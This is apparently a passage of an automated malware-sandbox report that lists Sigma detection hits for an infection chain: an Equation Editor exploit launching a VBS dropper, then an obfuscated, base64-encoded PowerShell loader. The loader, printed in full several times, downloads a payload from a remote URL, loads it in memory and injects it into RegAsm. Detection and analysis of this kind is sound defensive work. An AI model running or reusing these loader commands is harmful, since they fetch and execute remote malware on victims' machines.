                Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".((GV '*mDr*').naMe[3,11,2]-JoiN'')( (('{1}url = {0}htt'+'ps'+':/'+'/raw.g'+'it'+'hubusercont'+'ent'+'.co'+'m/NoDe'+'tec'+'tOn'+'/N'+'oD'+'e'+'tect'+'On/refs'+'/heads/'+'main'+'/Deta'+'hNo'+'th-V.txt{0}; {1'+'}'+'b'+'ase64Content = (New'+'-Ob'+'jec'+'t S'+'y'+'s'+'tem.Net'+'.Web'+'Clie'+'nt).'+'Downlo'+'adStr'+'ing({'+'1}u'+'rl); {1}b'+'in'+'aryContent = ['+'Syst'+'e'+'m.'+'Co'+'nver'+'t'+']'+'::'+'FromBa'+'se6'+'4S'+'t'+'ri'+'ng({'+'1'+'}ba'+'se'+'64Cont'+'e'+'n'+'t); {1}a'+'ssembly = ['+'Re'+'flect'+'i'+'on'+'.'+'Assem'+'b'+'ly]'+'::'+'Lo'+'ad('+'{1}b'+'inar'+'yConte'+'nt); [dnl'+'ib.IO.'+'Home]'+'::'+'VA'+'I({2}tx'+'t.BGF'+'R/'+'0'+'1'+'5/8.7.8'+'61.401//'+':ptth{2}, {'+'2'+'}'+'d'+'esa'+'tivado{2}'+', {2}de'+'s'+'ativad'+'o'+'{2'+'}, {2'+'}des'+'at'+'iva'+'do{'+'2}'+', {2}R'+'e'+'gAsm{'+'2}, {2'+'}{2},'+'{'+'2'+'}'+'{2})')-f [cHAR]39,[cHAR]36,[cHAR]34))", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".((GV '*mDr*').naMe[3,11,2]-JoiN'')( (('{1}url = {0}htt'+'ps'+':/'+'/raw.g'+'it'+'hubusercont'+'ent'+'.co'+'m/NoDe'+'tec'+'tOn'+'/N'+'oD'+'e'+'tect'+'On/refs'+'/heads/'+'main'+'/Deta'+'hNo'+'th-V.txt{0}; {1'+'}'+'b'+'ase64Content = (New'+'-Ob'+'jec'+'t S'+'y'+'s'+'tem.Net'+'.Web'+'Clie'+'nt).'+'Downlo'+'adStr'+'ing({'+'1}u'+'rl); {1}b'+'in'+'aryContent = ['+'Syst'+'e'+'m.'+'Co'+'nver'+'t'+']'+'::'+'FromBa'+'se6'+'4S'+'t'+'ri'+'ng({'+'1'+'}ba'+'se'+'64Cont'+'e'+'n'+'t); {1}a'+'ssembly = ['+'Re'+'flect'+'i'+'on'+'.'+'Assem'+'b'+'ly]'+'::'+'Lo'+'ad('+'{1}b'+'inar'+'yConte'+'nt); [dnl'+'ib.IO.'+'Home]'+'::'+'VA'+'I({2}tx'+'t.BGF'+'R/'+'0'+'1'+'5/8.7.8'+'61.401//'+':ptth{2}, {'+'2'+'}'+'d'+'esa'+'tivado{2}'+', {2}de'+'s'+'ativad'+'o'+'{2'+'}, {2'+'}des'+'at'+'iva'+'do{'+'2}'+', {2}R'+'e'+'gAsm{'+'2}, {2'+'}{2},'+'{'+'2'+'}'+'{2})')-f [cHAR]39,[cHAR]36,[cHAR]34))", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LigoR1YgJyptRHIqJykubmFNZVszLDExLDJdLUpvaU4nJykoICgoJ3sxfXVybCA9IHswfWh0dCcrJ3BzJysnOi8nKycvcmF3LmcnKydpdCcrJ2h1YnVzZXJjb250JysnZW50JysnLmNvJysnbS9Ob0RlJysndGVjJysndE9uJysnL04nKydvRCcrJ2UnKyd0ZWN0JysnT24vcmVmcycrJy9oZWFkcy8nKydtYWluJysnL0RldGEnKydoTm8nKyd0aC1WLnR4dHswfTsgezEnKyd9JysnYicrJ2FzZTY0Q29udGVudCA9IChOZXcnKyctT2InKydqZWMnKyd0IFMnKyd5JysncycrJ3RlbS5OZXQnKycuV2ViJysnQ2xpZScrJ250KS4nKydEb3dubG8nKydhZFN0cicrJ2luZyh7JysnMX11JysncmwpOyB7MX1iJysnaW4nKydhcnlDb250ZW50ID0gWycrJ1N5c3QnKydlJysnbS4nKydDbycrJ252ZXInKyd0JysnXScrJzo6JysnRnJvbUJhJysnc2U2JysnNFMnKyd0JysncmknKyduZyh7JysnMScrJ31iYScrJ3NlJysnNjRDb250Jys
                Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LigoR1YgJyptRHIqJykubmFNZVszLDExLDJdLUpvaU4nJykoICgoJ3sxfXVybCA9IHswfWh0dCcrJ3BzJysnOi8nKycvcmF3LmcnKydpdCcrJ2h1YnVzZXJjb250JysnZW50JysnLmNvJysnbS9Ob0RlJysndGVjJysndE9uJysnL04nKydvRCcrJ2UnKyd0ZWN0JysnT24vcmVmcycrJy9oZWFkcy8nKydtYWluJysnL0RldGEnKydoTm8nKyd0aC1WLnR4dHswfTsgezEnKyd9JysnYicrJ2FzZTY0Q29udGVudCA9IChOZXcnKyctT2InKydqZWMnKyd0IFMnKyd5JysncycrJ3RlbS5OZXQnKycuV2ViJysnQ2xpZScrJ250KS4nKydEb3dubG8nKydhZFN0cicrJ2luZyh7JysnMX11JysncmwpOyB7MX1iJysnaW4nKydhcnlDb250ZW50ID0gWycrJ1N5c3QnKydlJysnbS4nKydDbycrJ252ZXInKyd0JysnXScrJzo6JysnRnJvbUJhJysnc2U2JysnNFMnKyd0JysncmknKyduZyh7JysnMScrJ31iYScrJ3NlJysnNjRDb250JysnZScrJ24nKyd0KTsgezF9YScrJ3NzZW1ibHkgPSBbJysnUmUnKydmbGVjdCcrJ2knKydvbicrJy4nKydBc3NlbScrJ2InKydseV0nKyc6OicrJ0xvJysnYWQoJysnezF9YicrJ2luYXInKyd5Q29udGUnKydudCk7IFtkbmwnKydpYi5JTy4nKydIb21lXScrJzo6JysnVkEnKydJKHsyfXR4JysndC5CR0YnKydSLycrJzAnKycxJysnNS84LjcuOCcrJzYxLjQwMS8vJysnOnB0dGh7Mn0sIHsnKycyJysnfScrJ2QnKydlc2EnKyd0aXZhZG97Mn0nKycsIHsyfWRlJysncycrJ2F0aXZhZCcrJ28nKyd7MicrJ30sIHsyJysnfWRlcycrJ2F0JysnaXZhJysnZG97JysnMn0nKycsIHsyfVInKydlJysnZ0FzbXsnKycyfSwgezInKyd9ezJ9LCcrJ3snKycyJysnfScrJ3syfSknKS1mIFtjSEFSXTM5LFtjSEFSXTM2LFtjSEFSXTM0KSk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LigoR1YgJyptRHIqJykubmFNZVszLDExLDJdLUpvaU4nJykoICgoJ3sxfXVybCA9IHswfWh0dCcrJ3BzJysnOi8nKycvcmF3LmcnKydpdCcrJ2h1YnVzZXJjb250JysnZW50JysnLmNvJysnbS9Ob0RlJysndGVjJysndE9uJysnL04nKydvRCcrJ2UnKyd0ZWN0JysnT24vcmVmcycrJy9oZWFkcy8nKydtYWluJysnL0RldGEnKydoTm8nKyd0aC1WLnR4dHswfTsgezEnKyd9JysnYicrJ2FzZTY0Q29udGVudCA9IChOZXcnKyctT2InKydqZWMnKyd0IFMnKyd5JysncycrJ3RlbS5OZXQnKycuV2ViJysnQ2xpZScrJ250KS4nKydEb3dubG8nKydhZFN0cicrJ2luZyh7JysnMX11JysncmwpOyB7MX1iJysnaW4nKydhcnlDb250ZW50ID0gWycrJ1N5c3QnKydlJysnbS4nKydDbycrJ252ZXInKyd0JysnXScrJzo6JysnRnJvbUJhJysnc2U2JysnNFMnKyd0JysncmknKyduZyh7JysnMScrJ31iYScrJ3NlJysnNjRDb250JysnZScrJ24nKyd0KTsgezF9YScrJ3NzZW1ibHkgPSBbJysnUmUnKydmbGVjdCcrJ2knKydvbicrJy4nKydBc3NlbScrJ2InKydseV0nKyc6OicrJ0xvJysnYWQoJysnezF9YicrJ2luYXInKyd5Q29udGUnKydudCk7IFtkbmwnKydpYi5JTy4nKydIb21lXScrJzo6JysnVkEnKydJKHsyfXR4JysndC5CR0YnKydSLycrJzAnKycxJysnNS84LjcuOCcrJzYxLjQwMS8vJysnOnB0dGh7Mn0sIHsnKycyJysnfScrJ2QnKydlc2EnKyd0aXZhZG97Mn0nKycsIHsyfWRlJysncycrJ2F0aXZhZCcrJ28nKyd7MicrJ30sIHsyJysnfWRlcycrJ2F0JysnaXZhJysnZG97JysnMn0nKycsIHsyfVInKydlJysnZ0FzbXsnKycyfSwgezInKyd9ezJ9LCcrJ3snKycyJysnfScrJ3syfSknKS1mIFtjSEFSXTM5LFtjSEFSXTM2LFtjSEFSXTM0KSk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine|base64offset|contains: &, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName:
                Sigma detected: Suspicious Microsoft Office Child Process
                Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\niceworkwithpcitureupdateson.vBS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\niceworkwithpcitureupdateson.vBS" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 3800, ParentProcessName: EQNEDT32.EXE, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\niceworkwithpcitureupdateson.vBS" , ProcessId: 3872, ProcessName: wscript.exe
                Sigma detected: WScript or CScript Dropper
                Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\niceworkwithpcitureupdateson.vBS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\niceworkwithpcitureupdateson.vBS" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 3800, ParentProcessName: EQNEDT32.EXE, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\niceworkwithpcitureupdateson.vBS" , ProcessId: 3872, ProcessName: wscript.exe
                Sigma detected: Change PowerShell Policies to an Insecure Level
                Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LigoR1YgJyptRHIqJykubmFNZVszLDExLDJdLUpvaU4nJykoICgoJ3sxfXVybCA9IHswfWh0dCcrJ3BzJysnOi8nKycvcmF3LmcnKydpdCcrJ2h1YnVzZXJjb250JysnZW50JysnLmNvJysnbS9Ob0RlJysndGVjJysndE9uJysnL04nKydvRCcrJ2UnKyd0ZWN0JysnT24vcmVmcycrJy9oZWFkcy8nKydtYWluJysnL0RldGEnKydoTm8nKyd0aC1WLnR4dHswfTsgezEnKyd9JysnYicrJ2FzZTY0Q29udGVudCA9IChOZXcnKyctT2InKydqZWMnKyd0IFMnKyd5JysncycrJ3RlbS5OZXQnKycuV2ViJysnQ2xpZScrJ250KS4nKydEb3dubG8nKydhZFN0cicrJ2luZyh7JysnMX11JysncmwpOyB7MX1iJysnaW4nKydhcnlDb250ZW50ID0gWycrJ1N5c3QnKydlJysnbS4nKydDbycrJ252ZXInKyd0JysnXScrJzo6JysnRnJvbUJhJysnc2U2JysnNFMnKyd0JysncmknKyduZyh7JysnMScrJ31iYScrJ3NlJysnNjRDb250JysnZScrJ24nKyd0KTsgezF9YScrJ3NzZW1ibHkgPSBbJysnUmUnKydmbGVjdCcrJ2knKydvbicrJy4nKydBc3NlbScrJ2InKydseV0nKyc6OicrJ0xvJysnYWQoJysnezF9YicrJ2luYXInKyd5Q29udGUnKydudCk7IFtkbmwnKydpYi5JTy4nKydIb21lXScrJzo6JysnVkEnKydJKHsyfXR4JysndC5CR0YnKydSLycrJzAnKycxJysnNS84LjcuOCcrJzYxLjQwMS8vJysnOnB0dGh7Mn0sIHsnKycyJysnfScrJ2QnKydlc2EnKyd0aXZhZG97Mn0nKycsIHsyfWRlJysncycrJ2F0aXZhZCcrJ28nKyd7MicrJ30sIHsyJysnfWRlcycrJ2F0JysnaXZhJysnZG97JysnMn0nKycsIHsyfVInKydlJysnZ0FzbXsnKycyfSwgezInKyd9ezJ9LCcrJ3snKycyJysnfScrJ3syfSknKS1mIFtjSEFSXTM5LFtjSEFSXTM2LFtjSEFSXTM0KSk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LigoR1YgJyptRHIqJykubmFNZVszLDExLDJdLUpvaU4nJykoICgoJ3sxfXVybCA9IHswfWh0dCcrJ3BzJysnOi8nKycvcmF3LmcnKydpdCcrJ2h1YnVzZXJjb250JysnZW50JysnLmNvJysnbS9Ob0RlJysndGVjJysndE9uJysnL04nKydvRCcrJ2UnKyd0ZWN0JysnT24vcmVmcycrJy9oZWFkcy8nKydtYWluJysnL0RldGEnKydoTm8nKyd0aC1WLnR4dHswfTsgezEnKyd9JysnYicrJ2FzZTY0Q29udGVudCA9IChOZXcnKyctT2InKydqZWMnKyd0IFMnKyd5JysncycrJ3RlbS5OZXQnKycuV2ViJysnQ2xpZScrJ250KS4nKydEb3dubG8nKydhZFN0cicrJ2luZyh7JysnMX11JysncmwpOyB7MX1iJysnaW4nKydhcnlDb250ZW50ID0gWycrJ1N5c3QnKydlJysnbS4nKydDbycrJ252ZXInKyd0JysnXScrJzo6JysnRnJvbUJhJysnc2U2JysnNFMnKyd0JysncmknKyduZyh7JysnMScrJ31iYScrJ3NlJysnNjRDb250JysnZScrJ24nKyd0KTsgezF9YScrJ3NzZW1ibHkgPSBbJysnUmUnKydmbGVjdCcrJ2knKydvbicrJy4nKydBc3NlbScrJ2InKydseV0nKyc6OicrJ0xvJysnYWQoJysnezF9YicrJ2luYXInKyd5Q29udGUnKydudCk7IFtkbmwnKydpYi5JTy4nKydIb21lXScrJzo6JysnVkEnKydJKHsyfXR4JysndC5CR0YnKydSLycrJzAnKycxJysnNS84LjcuOCcrJzYxLjQwMS8vJysnOnB0dGh7Mn0sIHsnKycyJysnfScrJ2QnKydlc2EnKyd0aXZhZG97Mn0nKycsIHsyfWRlJysncycrJ2F0aXZhZCcrJ28nKyd7MicrJ30sIHsyJysnfWRlcycrJ2F0JysnaXZhJysnZG97JysnMn0nKycsIHsyfVInKydlJysnZ0FzbXsnKycyfSwgezInKyd9ezJ9LCcrJ3snKycyJysnfScrJ3syfSknKS1mIFtjSEFSXTM5LFtjSEFSXTM2LFtjSEFSXTM0KSk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine|base64offset|contains: &, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName:
                Sigma detected: Potentially Suspicious Execution Of Regasm/Regsvcs From Uncommon Location
                Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\ichnvnuxjbsorvkwq", CommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\ichnvnuxjbsorvkwq", CommandLine|base64offset|contains: ^, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, ParentCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe", ParentImage: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, ParentProcessId: 2136, ParentProcessName: RegAsm.exe, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\ichnvnuxjbsorvkwq", ProcessId: 1972, ProcessName: RegAsm.exe
                Sigma detected: Suspicious Office Outbound Connections
                Source: Network ConnectionAuthor: X__Junior (Nextron Systems): Data: DestinationIp: 192.168.2.22, DestinationIsIpv6: false, DestinationPort: 49161, EventID: 3, Image: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, Initiated: true, ProcessId: 3348, Protocol: tcp, SourceIp: 172.67.216.244, SourceIsIpv6: false, SourcePort: 443
                Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
                Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\niceworkwithpcitureupdateson.vBS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\niceworkwithpcitureupdateson.vBS" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 3800, ParentProcessName: EQNEDT32.EXE, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\niceworkwithpcitureupdateson.vBS" , ProcessId: 3872, ProcessName: wscript.exe
                Sigma detected: Modification of IE Registry Settings
                Source: Registry Key setAuthor: frack113: Data: Details: 46 00 00 00 2A 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ProcessId: 3348, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings
                Sigma detected: Non Interactive PowerShell Process Spawned
                Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LigoR1YgJyptRHIqJykubmFNZVszLDExLDJdLUpvaU4nJykoICgoJ3sxfXVybCA9IHswfWh0dCcrJ3BzJysnOi8nKycvcmF3LmcnKydpdCcrJ2h1YnVzZXJjb250JysnZW50JysnLmNvJysnbS9Ob0RlJysndGVjJysndE9uJysnL04nKydvRCcrJ2UnKyd0ZWN0JysnT24vcmVmcycrJy9oZWFkcy8nKydtYWluJysnL0RldGEnKydoTm8nKyd0aC1WLnR4dHswfTsgezEnKyd9JysnYicrJ2FzZTY0Q29udGVudCA9IChOZXcnKyctT2InKydqZWMnKyd0IFMnKyd5JysncycrJ3RlbS5OZXQnKycuV2ViJysnQ2xpZScrJ250KS4nKydEb3dubG8nKydhZFN0cicrJ2luZyh7JysnMX11JysncmwpOyB7MX1iJysnaW4nKydhcnlDb250ZW50ID0gWycrJ1N5c3QnKydlJysnbS4nKydDbycrJ252ZXInKyd0JysnXScrJzo6JysnRnJvbUJhJysnc2U2JysnNFMnKyd0JysncmknKyduZyh7JysnMScrJ31iYScrJ3NlJysnNjRDb250JysnZScrJ24nKyd0KTsgezF9YScrJ3NzZW1ibHkgPSBbJysnUmUnKydmbGVjdCcrJ2knKydvbicrJy4nKydBc3NlbScrJ2InKydseV0nKyc6OicrJ0xvJysnYWQoJysnezF9YicrJ2luYXInKyd5Q29udGUnKydudCk7IFtkbmwnKydpYi5JTy4nKydIb21lXScrJzo6JysnVkEnKydJKHsyfXR4JysndC5CR0YnKydSLycrJzAnKycxJysnNS84LjcuOCcrJzYxLjQwMS8vJysnOnB0dGh7Mn0sIHsnKycyJysnfScrJ2QnKydlc2EnKyd0aXZhZG97Mn0nKycsIHsyfWRlJysncycrJ2F0aXZhZCcrJ28nKyd7MicrJ30sIHsyJysnfWRlcycrJ2F0JysnaXZhJysnZG97JysnMn0nKycsIHsyfVInKydlJysnZ0FzbXsnKycyfSwgezInKyd9ezJ9LCcrJ3snKycyJysnfScrJ3syfSknKS1mIFtjSEFSXTM5LFtjSEFSXTM2LFtjSEFSXTM0KSk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LigoR1YgJyptRHIqJykubmFNZVszLDExLDJdLUpvaU4nJykoICgoJ3sxfXVybCA9IHswfWh0dCcrJ3BzJysnOi8nKycvcmF3LmcnKydpdCcrJ2h1YnVzZXJjb250JysnZW50JysnLmNvJysnbS9Ob0RlJysndGVjJysndE9uJysnL04nKydvRCcrJ2UnKyd0ZWN0JysnT24vcmVmcycrJy9oZWFkcy8nKydtYWluJysnL0RldGEnKydoTm8nKyd0aC1WLnR4dHswfTsgezEnKyd9JysnYicrJ2FzZTY0Q29udGVudCA9IChOZXcnKyctT2InKydqZWMnKyd0IFMnKyd5JysncycrJ3RlbS5OZXQnKycuV2ViJysnQ2xpZScrJ250KS4nKydEb3dubG8nKydhZFN0cicrJ2luZyh7JysnMX11JysncmwpOyB7MX1iJysnaW4nKydhcnlDb250ZW50ID0gWycrJ1N5c3QnKydlJysnbS4nKydDbycrJ252ZXInKyd0JysnXScrJzo6JysnRnJvbUJhJysnc2U2JysnNFMnKyd0JysncmknKyduZyh7JysnMScrJ31iYScrJ3NlJysnNjRDb250JysnZScrJ24nKyd0KTsgezF9YScrJ3NzZW1ibHkgPSBbJysnUmUnKydmbGVjdCcrJ2knKydvbicrJy4nKydBc3NlbScrJ2InKydseV0nKyc6OicrJ0xvJysnYWQoJysnezF9YicrJ2luYXInKyd5Q29udGUnKydudCk7IFtkbmwnKydpYi5JTy4nKydIb21lXScrJzo6JysnVkEnKydJKHsyfXR4JysndC5CR0YnKydSLycrJzAnKycxJysnNS84LjcuOCcrJzYxLjQwMS8vJysnOnB0dGh7Mn0sIHsnKycyJysnfScrJ2QnKydlc2EnKyd0aXZhZG97Mn0nKycsIHsyfWRlJysncycrJ2F0aXZhZCcrJ28nKyd7MicrJ30sIHsyJysnfWRlcycrJ2F0JysnaXZhJysnZG97JysnMn0nKycsIHsyfVInKydlJysnZ0FzbXsnKycyfSwgezInKyd9ezJ9LCcrJ3snKycyJysnfScrJ3syfSknKS1mIFtjSEFSXTM5LFtjSEFSXTM2LFtjSEFSXTM0KSk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine|base64offset|contains: &, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName:
                Sigma detected: Office Macro File Creation
                Source: File createdAuthor: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ProcessId: 3348, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
                Sigma detected: Potential Encoded PowerShell Patterns In CommandLine
                Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".((GV '*mDr*').naMe[3,11,2]-JoiN'')( (('{1}url = {0}htt'+'ps'+':/'+'/raw.g'+'it'+'hubusercont'+'ent'+'.co'+'m/NoDe'+'tec'+'tOn'+'/N'+'oD'+'e'+'tect'+'On/refs'+'/heads/'+'main'+'/Deta'+'hNo'+'th-V.txt{0}; {1'+'}'+'b'+'ase64Content = (New'+'-Ob'+'jec'+'t S'+'y'+'s'+'tem.Net'+'.Web'+'Clie'+'nt).'+'Downlo'+'adStr'+'ing({'+'1}u'+'rl); {1}b'+'in'+'aryContent = ['+'Syst'+'e'+'m.'+'Co'+'nver'+'t'+']'+'::'+'FromBa'+'se6'+'4S'+'t'+'ri'+'ng({'+'1'+'}ba'+'se'+'64Cont'+'e'+'n'+'t); {1}a'+'ssembly = ['+'Re'+'flect'+'i'+'on'+'.'+'Assem'+'b'+'ly]'+'::'+'Lo'+'ad('+'{1}b'+'inar'+'yConte'+'nt); [dnl'+'ib.IO.'+'Home]'+'::'+'VA'+'I({2}tx'+'t.BGF'+'R/'+'0'+'1'+'5/8.7.8'+'61.401//'+':ptth{2}, {'+'2'+'}'+'d'+'esa'+'tivado{2}'+', {2}de'+'s'+'ativad'+'o'+'{2'+'}, {2'+'}des'+'at'+'iva'+'do{'+'2}'+', {2}R'+'e'+'gAsm{'+'2}, {2'+'}{2},'+'{'+'2'+'}'+'{2})')-f [cHAR]39,[cHAR]36,[cHAR]34))", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".((GV '*mDr*').naMe[3,11,2]-JoiN'')( (('{1}url = {0}htt'+'ps'+':/'+'/raw.g'+'it'+'hubusercont'+'ent'+'.co'+'m/NoDe'+'tec'+'tOn'+'/N'+'oD'+'e'+'tect'+'On/refs'+'/heads/'+'main'+'/Deta'+'hNo'+'th-V.txt{0}; {1'+'}'+'b'+'ase64Content = (New'+'-Ob'+'jec'+'t S'+'y'+'s'+'tem.Net'+'.Web'+'Clie'+'nt).'+'Downlo'+'adStr'+'ing({'+'1}u'+'rl); {1}b'+'in'+'aryContent = ['+'Syst'+'e'+'m.'+'Co'+'nver'+'t'+']'+'::'+'FromBa'+'se6'+'4S'+'t'+'ri'+'ng({'+'1'+'}ba'+'se'+'64Cont'+'e'+'n'+'t); {1}a'+'ssembly = ['+'Re'+'flect'+'i'+'on'+'.'+'Assem'+'b'+'ly]'+'::'+'Lo'+'ad('+'{1}b'+'inar'+'yConte'+'nt); [dnl'+'ib.IO.'+'Home]'+'::'+'VA'+'I({2}tx'+'t.BGF'+'R/'+'0'+'1'+'5/8.7.8'+'61.401//'+':ptth{2}, {'+'2'+'}'+'d'+'esa'+'tivado{2}'+', {2}de'+'s'+'ativad'+'o'+'{2'+'}, {2'+'}des'+'at'+'iva'+'do{'+'2}'+', {2}R'+'e'+'gAsm{'+'2}, {2'+'}{2},'+'{'+'2'+'}'+'{2})')-f [cHAR]39,[cHAR]36,[cHAR]34))", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 